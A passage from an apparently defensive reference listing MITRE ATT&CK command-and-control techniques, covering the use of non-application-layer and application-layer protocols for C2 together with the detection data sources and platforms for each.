Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre